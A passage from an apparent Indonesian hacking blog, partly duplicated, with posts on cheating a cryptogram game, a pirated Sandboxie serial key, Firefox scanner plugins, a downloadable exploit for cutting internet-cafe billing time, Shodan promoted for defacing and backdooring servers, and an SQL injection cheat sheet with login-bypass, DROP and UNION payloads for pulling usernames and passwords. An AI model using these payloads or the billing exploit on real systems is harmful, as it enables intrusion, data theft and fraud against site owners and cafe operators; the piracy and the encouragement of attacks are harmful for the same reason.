emang tuh game kalau kalau bagi yang suka main paling ketawa...tapi kalau di telusuri lebih lanjut tuh game sangat berguna apalagi bagi seora
10.26.2010
CARA CURANG MAIN GAME CRYPTOGRAM
haha dah tau kan kalau di website LEMBAGA SANDI NEGARA ada permainan flash kaya semacam pengenalan crypografi.http://www.lemsaneg.go.id/crypto
10.15.2010
Sanboxie dan serial key nya
kali ini saya kan mencoba berbagi serial key sanboxie.walaupun komputer anda sudah di pasang
anti virus tidak ada salahnya menambahkan sanboxie untuk keamanan sistem window anda
1. Secure Web Browsing: Menjalankan browser Web di bawah perlindungan Sandboxie berarti bahwa semua perangkat lunak berbahaya yang di download oleh browser akan terjebak dalam Sandbox dan dapat dibuang trivial.2. Enhanced Privasi: Browsing history, cookies, cache dan file-file sementara yang dikumpulkan sewaktu browsing Web tinggal di Sandbox dan tidak bocor ke Windows.
3. Secure E-mail: Virus dan perangkat lunak berbahaya lainnya yang mungkin bersembunyi di email Anda tidak bisa keluar dari Sandbox dan tidak dapat menginfeksi sistem Anda yang sesungguhnya.
4. Windows Stays Lean: Mencegah terjadinya kerusakan di Windows dengan menginstal perangkat lunak ke dalam Box Isolasi Sandbox.
5. Mencegah perubahan pada kedua file Anda dan pengaturan registri, sehingga hampir mustahil untuk setiap perangkat lunak untuk mencapai di luar sandbox.
6. Perangkap item cache browser ke dalam Sandbox sebagai produk sampingan dari operasi normal, sehingga bilaberkut link download
dan ini serial key nya
10.14.2010
membuat scaner mozila acuntiex plus web anti phising atack
menambahkan plugin acuntix pada mozila.....ya so pasti berat cos banyak plugin yg digunakan tapi saya sudah mencoba bahkan memakai 3 plugin ...nyantai nyantai aja tuh....
oh iya bagi yang belum tahu kegunaan acuntik vulberty tuh apa ya ?
acuntix tuh scaner tuh mencari celah pada suatu web baik itu celah sql injection atau xxs..jangan tanya yach sql injection tuh apa...cape ngejelaisanya.hahaha
tapi kendalanya pasti lah berat si mozila itu haha....tpi kali ini tidak ko
pertama tama siapkan--roko n kopi...nyantai aja gampang ini
1-mozila versi,3 yg saya gunakan download plugin acuntix nya
disini acuntix plugin
yach pasti kurang power full kan cuma pakai satu plugin haha nyantai aja
kita juga tambahkan netcraf..anti phising..loh apa gunanya??
haha tuh plugin bisa digunakan untuk mencari stuktur web ,dns.hosting suatu
suatu web..wah pasti makin berat kan..ga juga .nyantai aja download
di sini netcraft plugin
berikut adalah tampilan mozila scaner
berkut ini adalah tampilan mozila saya.ya so pasti tampilan kaya gini berat ? ga juga lah
berikut cara supaya mozila tuh lebih ringan
1. Buka Mozilla.
2. Ketikan di addres bar “about:config” (tanpa tanda patik).
3. Scroll mouse anda kebawah dan cari “network.http.max-connections“, double klik dan masukan nilai “64“.
4. Cari “network.http.max-connections-per-server“, double klik dan masukan nilai “21“.
5. Cari ‘network.http.max-persistent-connections-per-server“, double klik dan masukan nilai “8“.
6. Doube klik pada “network.http.pipelining ” menjadi “true“.
7. Cari “network.http.pipelining.maxrequests“, double klik dan masukan nilai “100“.
8. Double klik pada “network.http.proxy.pipelining” menjadi “true“.
9. Langkah terakhir, klik kanan dimana saja pilih : New >> integrar >> lalu tulis “nglayout.initialpaint.delay” (tanpa tanda petik”. Kemudian masukan nilai “0“.
coba rasakan?di samping banyak plugin tapi tetep kan mozila nya ringan..bahkan pakai plugin tampilan..
selamat berexperimen...blog go blog
oh iya bagi yang belum tahu kegunaan acuntik vulberty tuh apa ya ?
acuntix tuh scaner tuh mencari celah pada suatu web baik itu celah sql injection atau xxs..jangan tanya yach sql injection tuh apa...cape ngejelaisanya.hahaha
tapi kendalanya pasti lah berat si mozila itu haha....tpi kali ini tidak ko
pertama tama siapkan--roko n kopi...nyantai aja gampang ini
1-mozila versi,3 yg saya gunakan download plugin acuntix nya
disini acuntix plugin
yach pasti kurang power full kan cuma pakai satu plugin haha nyantai aja
kita juga tambahkan netcraf..anti phising..loh apa gunanya??
haha tuh plugin bisa digunakan untuk mencari stuktur web ,dns.hosting suatu
suatu web..wah pasti makin berat kan..ga juga .nyantai aja download
di sini netcraft plugin
berikut adalah tampilan mozila scaner
berikut cara supaya mozila tuh lebih ringan
1. Buka Mozilla.
2. Ketikan di addres bar “about:config” (tanpa tanda patik).
3. Scroll mouse anda kebawah dan cari “network.http.max-connections“, double klik dan masukan nilai “64“.
4. Cari “network.http.max-connections-per-server“, double klik dan masukan nilai “21“.
5. Cari ‘network.http.max-persistent-connections-per-server“, double klik dan masukan nilai “8“.
6. Doube klik pada “network.http.pipelining ” menjadi “true“.
7. Cari “network.http.pipelining.maxrequests“, double klik dan masukan nilai “100“.
8. Double klik pada “network.http.proxy.pipelining” menjadi “true“.
9. Langkah terakhir, klik kanan dimana saja pilih : New >> integrar >> lalu tulis “nglayout.initialpaint.delay” (tanpa tanda petik”. Kemudian masukan nilai “0“.
coba rasakan?di samping banyak plugin tapi tetep kan mozila nya ringan..bahkan pakai plugin tampilan..
selamat berexperimen...blog go blog
10.13.2010
riset biling explorer
haha selain karya http://bit.ly/at8o09 r robi noparaya tentang cara gratisan di warnet dengan menggunakan metode
kekeluargaan hihihi saya juga mau share tentang cara riset biling di warnet yang menggunakan
billing Billing-Explorer ver 4.43 R-17
kekeluargaan hihihi saya juga mau share tentang cara riset biling di warnet yang menggunakan
billing Billing-Explorer ver 4.43 R-17
- * DeskPro 6.0s 2006 R.07 Security#5 Edition
* BillingExplorer Ver DeskPro 6 2007
- exploit ini dibikin pkai vb 6
- ingat exploitynya jangan di salah gunakan kasihankan para OP apalagi yg masih cupu
- semata-mata hanya memperlihatkan penggunaan Winsock dengan visual basic.
- nih hanya media pembelajaan link download biling riset
SHODAN Web search engine,untuk mencari perangkat lunak apache-php
Sebuah mesin pencari baru telah diperkenalkan disebut "Shodan" yang memungkinkan Anda menemukan komputer khusus (router, server, dll)ika Anda ingin mengetahui versi dari Microsoft IIS yang paling populer.
Atau Anda ingin melihat berapa banyak anonymous FTP server ada? Mungkin kerentanan baru keluar dan Anda ingin melihat berapa banyak host itu bisa menginfeksi?baik mau melakukan defacing sebuah web atau pasang bacdor DDOS ke sebuah mesin server web
SHODAN ini lumayan ampuh bahkan bisa melakukan root besar besaran ke sebuah web server
wiih sadis yah seperti ini tampilan shodan
hasil pencarian bahkan sampai 1000 result
hihiii bagus juga nih buat para atacker
untuk lebih lanjut silahkan ke TKP..
KLIK. shodan
Atau Anda ingin melihat berapa banyak anonymous FTP server ada? Mungkin kerentanan baru keluar dan Anda ingin melihat berapa banyak host itu bisa menginfeksi?baik mau melakukan defacing sebuah web atau pasang bacdor DDOS ke sebuah mesin server web
SHODAN ini lumayan ampuh bahkan bisa melakukan root besar besaran ke sebuah web server
wiih sadis yah seperti ini tampilan shodan
hihiii bagus juga nih buat para atacker
untuk lebih lanjut silahkan ke TKP..
KLIK. shodan
3.15.2010
SQL injection
This information is for educational purpose only.
Please use this information wisely.
Udah pada tau kan soal SQL injection?
Yah kalo belum baca deh Tutorialnya (dulu pernah ta buat)
Itu tutorial basic, sekarang kita ke tutorial advance.
Disini ga akan dibahas gimana cara inject nya tapi berbagai syntax yang bisa kita gunakan
untuk menginject suatu website (jika emang bisa diinject).
Oke, lets’ begin
Syntax SQL Injection
1. Commenting out.
Gunanya untuk mengakhiri suatu query, bypass query.
+ SQL Server
Syntax: –
Penggunaan: DROP namatabel;–
+ MySQL
Syntax: #
Penggunaan: DROP namatabel;#
Contoh penggunaan in real life:
* Username: admin’–
* Proses query yang terjadi di server:
SELECT * FROM userlist WHERE username=’admin’–’ AND password=’password’;
Query ini akan memberikan km akses sebagai admin karena query selanjutnya setelah — akan diabaikan
2. Inline comment
Gunanya untuk mengetahui versi SQL server yang digunakan atau untuk bypass script proteksi
+ SQL Server (MySQL juga bisa)
Syntax: /*Comment*/
Penggunaan: DROP/*comment*/namatabel
atau: DR/**/OP/*bypass proteksi*/namatabel
atau: SELECT/*menghindari-spasi*/password/**/FROM/**/userlist
+ MySQL (mendeteksi versi)
Syntax: /*!MYSQL Special SQL*/
Penggunaan: SELECT /*!32302 1/0,*/1 FROM namatabel
Note: Syntax juga bisa digunakan jika versi MySQL lebih tinggi dari 3.23.02 (sesuai query), tidak berfungsi untuk versi dibawahnya
3. Staking queries
Gunanya untuk menyambung 2 buah query dalam 1 transaksi.
+ SQL Server
Syntax: ;
Penggunaan: SELECT * FROM namatabel; DROP namatabel–
4. Pernyataan IF
Ini kunci jika melakukan Blind SQL Injection, juga berguna untuk testing sesuatu yang ga jelas secara akurat
+ SQL Server
Syntax: IF kondisi bagian-true ELSE bagian-false
Penggunaan: IF (1=1) SELECT ‘true’ ELSE SELECT ‘false’
+ MySQL
Syntax: IF(kondisi,bagian-true,bagian-false)
Penggunaan: SELECT IF(1=1,’true’,’false’)
5. Operasi String
Gunanya untuk bypass proteksi
+ SQL Server
Syntax: +
Penggunaan: SELECT login + ‘-’ + password FROM userlist
+ MySQL Server
Syntax: ||
Penggunaan: SELECT login || ‘-’ || password FROM userlist
Note: Jika MySQL server dalam mode ANSI syntax berfunsi. Cara lain adalah dengan menggunakan fungsi CONCAT() dalam MySQL.
Syntax: CONCAT(str1,str2,str3,…)
Penggunaan: SELECT CONCAT(login,password) FROM userlist
6. Union Injection
Gunanya menggabungkan 2 tabel yang berbeda dengan syarat tabel itu harus sama jumlah kolomnya.
Syntax: UNION
Penggunaan: ‘ UNION SELECT * FROM namatabel
atau: ‘ UNION ALL SELECT * FROM namatabel
atau: ‘ UNION SELECT kolom1,kolom2 FROM namatabel
Proses yang terjadi dalam query:
SELECT * FROM user WHERE id=’1′ UNION SELECT kolom1,kolom2 FROM namatabel
Jika tabel tersebut mempunyai kolom yang berbeda, maka dapat ditambahkan null atau 1
Penggunaan: ‘ UNION SELECT 1,kolom1,kolom2
Please use this information wisely.
Udah pada tau kan soal SQL injection?
Yah kalo belum baca deh Tutorialnya (dulu pernah ta buat)
Itu tutorial basic, sekarang kita ke tutorial advance.
Disini ga akan dibahas gimana cara inject nya tapi berbagai syntax yang bisa kita gunakan
untuk menginject suatu website (jika emang bisa diinject).
Oke, lets’ begin
Syntax SQL Injection
1. Commenting out.
Gunanya untuk mengakhiri suatu query, bypass query.
+ SQL Server
Syntax: –
Penggunaan: DROP namatabel;–
+ MySQL
Syntax: #
Penggunaan: DROP namatabel;#
Contoh penggunaan in real life:
* Username: admin’–
* Proses query yang terjadi di server:
SELECT * FROM userlist WHERE username=’admin’–’ AND password=’password’;
Query ini akan memberikan km akses sebagai admin karena query selanjutnya setelah — akan diabaikan
2. Inline comment
Gunanya untuk mengetahui versi SQL server yang digunakan atau untuk bypass script proteksi
+ SQL Server (MySQL juga bisa)
Syntax: /*Comment*/
Penggunaan: DROP/*comment*/namatabel
atau: DR/**/OP/*bypass proteksi*/namatabel
atau: SELECT/*menghindari-spasi*/password/**/FROM/**/userlist
+ MySQL (mendeteksi versi)
Syntax: /*!MYSQL Special SQL*/
Penggunaan: SELECT /*!32302 1/0,*/1 FROM namatabel
Note: Syntax juga bisa digunakan jika versi MySQL lebih tinggi dari 3.23.02 (sesuai query), tidak berfungsi untuk versi dibawahnya
3. Staking queries
Gunanya untuk menyambung 2 buah query dalam 1 transaksi.
+ SQL Server
Syntax: ;
Penggunaan: SELECT * FROM namatabel; DROP namatabel–
4. Pernyataan IF
Ini kunci jika melakukan Blind SQL Injection, juga berguna untuk testing sesuatu yang ga jelas secara akurat
+ SQL Server
Syntax: IF kondisi bagian-true ELSE bagian-false
Penggunaan: IF (1=1) SELECT ‘true’ ELSE SELECT ‘false’
+ MySQL
Syntax: IF(kondisi,bagian-true,bagian-false)
Penggunaan: SELECT IF(1=1,’true’,’false’)
5. Operasi String
Gunanya untuk bypass proteksi
+ SQL Server
Syntax: +
Penggunaan: SELECT login + ‘-’ + password FROM userlist
+ MySQL Server
Syntax: ||
Penggunaan: SELECT login || ‘-’ || password FROM userlist
Note: Jika MySQL server dalam mode ANSI syntax berfunsi. Cara lain adalah dengan menggunakan fungsi CONCAT() dalam MySQL.
Syntax: CONCAT(str1,str2,str3,…)
Penggunaan: SELECT CONCAT(login,password) FROM userlist
6. Union Injection
Gunanya menggabungkan 2 tabel yang berbeda dengan syarat tabel itu harus sama jumlah kolomnya.
Syntax: UNION
Penggunaan: ‘ UNION SELECT * FROM namatabel
atau: ‘ UNION ALL SELECT * FROM namatabel
atau: ‘ UNION SELECT kolom1,kolom2 FROM namatabel
Proses yang terjadi dalam query:
SELECT * FROM user WHERE id=’1′ UNION SELECT kolom1,kolom2 FROM namatabel
Jika tabel tersebut mempunyai kolom yang berbeda, maka dapat ditambahkan null atau 1
Penggunaan: ‘ UNION SELECT 1,kolom1,kolom2
Langganan:
Postingan (Atom)